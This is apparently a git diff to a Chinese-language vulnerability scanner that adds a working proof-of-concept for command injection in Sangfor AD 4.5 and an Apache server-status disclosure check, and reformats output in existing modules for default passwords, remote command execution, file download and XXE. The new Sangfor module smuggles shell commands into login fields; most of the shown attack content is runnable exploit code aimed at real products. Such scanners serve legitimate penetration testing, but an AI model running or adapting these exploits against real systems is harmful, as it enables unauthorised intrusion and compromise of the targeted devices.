            "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        payload = "/server-status"
        vulnurl = self.url + payload
        try:
            req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
            if r"Server uptime" in req.text and r"Server Status" in req.text and req.status_code==200:
                cprint("[+]存在git源码泄露漏洞...(低危)\tpayload: "+vulnurl, "green")
        except:
            cprint("[-] "+__file__+"====>连接超时", "cyan")
 if __name__ == "__main__":
    warnings.filterwarnings("ignore")
    testVuln = apache_server_status_disclosure_BaseVerify(sys.argv[1])
    testVuln.run()
--- a/information/informationmain.py
+++ b/information/informationmain.py
@@ -10,4 +10,5 @@ from information.robots_find import robots_find_BaseVerify
 from information.git_check import git_check_BaseVerify
 from information.jsp_conf_find import jsp_conf_find_BaseVerify
 from information.svn_check import svn_check_BaseVerify
-from information.jetbrains_ide_workspace_disclosure import jetbrains_ide_workspace_disclosure_BaseVerify
+from information.jetbrains_ide_workspace_disclosure import jetbrains_ide_workspace_disclosure_BaseVerify
 from information.apache_server_status_disclosure import apache_server_status_disclosure_BaseVerify
--- a/information/robots_find.py
+++ b/information/robots_find.py
@@ -22,7 +22,7 @@ class robots_find_BaseVerify:
            req = requests.get(vulnurl, timeout=10, verify=False)
            if "Disallow" in req.text:
-                cprint("[+]存在robots.txt爬虫文件...(敏感信息)", "green")
+                cprint("[+]存在robots.txt爬虫文件...(敏感信息)"+"\tpayload: "+vulnurl, "green")
        except:
            cprint("[-] "+__file__+"====>连接超时", "cyan")
--- a/pocdb.py
+++ b/pocdb.py
@@ -20,6 +20,7 @@ class pocdb_pocs:
            "robots文件发现":robots_find_BaseVerify(url),
            "svn源码泄露扫描":svn_check_BaseVerify(url),
            "JetBrains IDE workspace.xml文件泄露":jetbrains_ide_workspace_disclosure_BaseVerify(url),
            "apache server-status信息泄露":apache_server_status_disclosure_BaseVerify(url),
        }
        self.cmspocdict = {
            "韩国autoset建站程序phpmyadmin任意登录漏洞":autoset_phpmyadmin_unauth_BaseVerify(url),
@@ -299,6 +300,7 @@ class pocdb_pocs:
            "smtp starttls明文命令注入(CVE-2011-0411)":smtp_starttls_plaintext_inj_BaseVerify(url),
            "resin viewfile 任意文件读取":resin_viewfile_fileread_BaseVerify(url),
            "mongodb 未授权漏洞":mongodb_unauth_BaseVerify(url),
            "深信服 AD4.5版本下命令执行漏洞":sangfor_ad_script_command_exec_BaseVerify(url),
        }
        self.hardwarepocdict = {
            "Dlink 本地文件包含":router_dlink_webproc_fileread_BaseVerify(url),
--- a/system/dorado/dorado_default_passwd.py
+++ b/system/dorado/dorado_default_passwd.py
@@ -34,10 +34,10 @@ class dorado_default_passwd_BaseVerify:
        try:
            req = requests.post(vulnurl, data=post_data, headers=headers, timeout=10, verify=False)
            if r"console.showSystemInfo.d" in req.text:
-                cprint("[+]存在dorado默认口令漏洞...(高危)\tpayload: "+vulnurl+"\tpost: "+json.dumps(post_data), "red")
+                cprint("[+]存在dorado默认口令漏洞...(高危)\tpayload: "+vulnurl+"\npost: "+json.dumps(post_data, indent=4), "red")
            req2 = requests.post(vulnurl, data=post_data2, headers=headers, timeout=10, verify=False)
            if r"console.showSystemInfo.d" in req.text:
-                cprint("[+]存在dorado默认口令漏洞...(高危)\tpayload: "+vulnurl+"\tpost: "+json.dumps(post_data2), "red")
+                cprint("[+]存在dorado默认口令漏洞...(高危)\tpayload: "+vulnurl+"\npost: "+json.dumps(post_data2, indent=4), "red")
        except:
            cprint("[-] "+__file__+"====>连接超时", "cyan")
--- a/system/sangfor/init.py
+++ b/system/sangfor/init.py
--- a/system/sangfor/sangfor_ad_script_command_exec.py
+++ b/system/sangfor/sangfor_ad_script_command_exec.py
@@ -0,0 +1,54 @@
 #!/usr/bin/env python
 # -*- coding: utf-8 -*-
 '''
 name: 深信服 AD4.5版本下命令执行漏洞
 referer: http://www.wooyun.org/bugs/wooyun-2016-0196014
 author: Lucifer
 description: 85端口两处命令执行，参数userID和userPsw。
 '''
 import sys
 import json
 import requests
 import warnings
 from termcolor import cprint
 class sangfor_ad_script_command_exec_BaseVerify():
    def __init__(self, url):
        self.url = url
    def run(self):
        headers = {
            "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        payload = ":85/report/script/login.php"
        vulnurl = self.url + payload
        post_data = {
            "userID":"username;echo 81dc9bdb52d04dc20036dbd8313ed055;",
            "log_type":"report",
            "userPsw":"password",
            "rnd":"0.8423849339596927"
        }
        post_data2 = {
            "userID":"username",
            "log_type":"report",
            "userPsw":"password;echo d93591bdf7860e1e4ee2fca799911215;",
            "rnd":"0.8423849339596927"
        }
        try:
            req = requests.post(vulnurl, data=post_data, headers=headers, timeout=10, verify=False)
            if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text:
                cprint("[+]存在深信服 AD4.5版本下命令执行漏洞...(高危)\tpayload: "+vulnurl+"\npost: "+json.dumps(post_data, indent=4), "red")
            req = requests.post(vulnurl, data=post_data2, headers=headers, timeout=10, verify=False)
            if r"d93591bdf7860e1e4ee2fca799911215" in req.text:
                cprint("[+]存在深信服 AD4.5版本下命令执行漏洞...(高危)\tpayload: "+vulnurl+"\npost: "+json.dumps(post_data2, indent=4), "red")
        except:
            cprint("[-] "+__file__+"====>连接超时", "cyan")
 if __name__ == "__main__":
    warnings.filterwarnings("ignore")
    testVuln = sangfor_ad_script_command_exec_BaseVerify(sys.argv[1])
    testVuln.run()
--- a/system/srun/srun_index_file_filedownload.py
+++ b/system/srun/srun_index_file_filedownload.py
@@ -29,7 +29,7 @@ class srun_index_file_filedownload_BaseVerify:
        try:
            req = requests.post(vulnurl, data=post_data, headers=headers, timeout=10, verify=False)
            if r"hostname" in req.text and r"clientver" in req.text:
-                cprint("[+]存在深澜软件srun3000计费系统任意文件下载漏洞...(高危)\tpayload: "+vulnurl+"\tpost: "+json.dumps(post_data), "red")
+                cprint("[+]存在深澜软件srun3000计费系统任意文件下载漏洞...(高危)\tpayload: "+vulnurl+"\npost: "+json.dumps(post_data, indent=4), "red")
        except:
            cprint("[-] "+__file__+"====>连接超时", "cyan")
--- a/system/srun/srun_rad_online_bypass_rce.py
+++ b/system/srun/srun_rad_online_bypass_rce.py
@@ -31,7 +31,7 @@ class srun_rad_online_bypass_rce_BaseVerify:
            shellurl = self.url + "/hit.txt"
            req2 = requests.get(shellurl, headers=headers, timeout=10, verify=False)
            if r"81dc9bdb52d04dc20036dbd8313ed055" in req2.text:
-                cprint("[+]存在深澜软件srun3000计费系统rad_online.php命令执行bypass漏洞...(高危)\tpayload: "+vulnurl+"\tpost: "+json.dumps(post_data)+"\tshellurl: "+shellurl, "red")
+                cprint("[+]存在深澜软件srun3000计费系统rad_online.php命令执行bypass漏洞...(高危)\tpayload: "+vulnurl+"\npost: "+json.dumps(post_data, indent=4)+"\nshellurl: "+shellurl, "red")
        except:
            cprint("[-] "+__file__+"====>连接超时", "cyan")
--- a/system/srun/srun_rad_online_username_rce.py
+++ b/system/srun/srun_rad_online_username_rce.py
@@ -31,7 +31,7 @@ class srun_rad_online_username_rce_BaseVerify:
            shellurl = self.url + "/hit.txt"
            req2 = requests.get(shellurl, headers=headers, timeout=10, verify=False)
            if r"81dc9bdb52d04dc20036dbd8313ed055" in req2.text:
-                cprint("[+]存在深澜软件srun3000计费系统rad_online.php命令执行bypass漏洞...(高危)\tpayload: "+vulnurl+"\tpost: "+json.dumps(post_data)+"\tshellurl: "+shellurl, "red")
+                cprint("[+]存在深澜软件srun3000计费系统rad_online.php命令执行bypass漏洞...(高危)\tpayload: "+vulnurl+"\npost: "+json.dumps(post_data, indent=4)+"\nshellurl: "+shellurl, "red")
        except:
            cprint("[-] "+__file__+"====>连接超时", "cyan")
--- a/system/srun/srun_user_info_uid_rce.py
+++ b/system/srun/srun_user_info_uid_rce.py
@@ -26,7 +26,7 @@ class srun_user_info_uid_rce_BaseVerify:
            shellurl = self.url + "/hit.txt"
            req2 = requests.get(shellurl, headers=headers, timeout=10, verify=False)
            if r"81dc9bdb52d04dc20036dbd8313ed055" in req2.text:
-                cprint("[+]存在深澜软件srun3000计费系统user_info.php命令执行漏洞...(高危)\tpayload: "+vulnurl+"\tshellurl: "+shellurl, "red")
+                cprint("[+]存在深澜软件srun3000计费系统user_info.php命令执行漏洞...(高危)\tpayload: "+vulnurl+"\nshellurl: "+shellurl, "red")
        except:
            cprint("[-] "+__file__+"====>连接超时", "cyan")
--- a/system/systemmain.py
+++ b/system/systemmain.py
@@ -73,4 +73,7 @@ from system.smtp.smtp_starttls_plaintext_inj import smtp_starttls_plaintext_inj_
 from system.resin.resin_viewfile_fileread import resin_viewfile_fileread_BaseVerify
 #mongodb vulns
-from system.mongodb.mongodb_unauth import mongodb_unauth_BaseVerify
+from system.mongodb.mongodb_unauth import mongodb_unauth_BaseVerify
 #sangfor vulns
 from system.sangfor.sangfor_ad_script_command_exec import sangfor_ad_script_command_exec_BaseVerify
--- a/system/turbomail/turbogate_services_xxe.py
+++ b/system/turbomail/turbogate_services_xxe.py
@@ -8,6 +8,7 @@ description: TurboGate其实相当于TurboMail的早期版本，TurboGate集成
        在TurboGate中使用的是axis2<=1.5.1版本，存在XXE漏洞，在利用的时候需要将Content-Type设置为application/xml。
 '''
 import sys
 import json
 import requests
 import warnings
 from termcolor import cprint
@@ -27,7 +28,7 @@ class turbogate_services_xxe_BaseVerify():
        try:
            req = requests.post(vulnurl, headers=headers, data=post_data, timeout=10, verify=False)
            if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text:
-                cprint("[+]存在TurboGate邮件网关XXE漏洞...(高危)\tpayload: "+vulnurl+"\t\tpost: "+post_data, "red")
+                cprint("[+]存在TurboGate邮件网关XXE漏洞...(高危)\tpayload: "+vulnurl+"\npost: "+post_data+"\npost: "+json.dumps(post_data, indent=4), "red")
        except:
            cprint("[-] "+__file__+"====>连接超时", "cyan")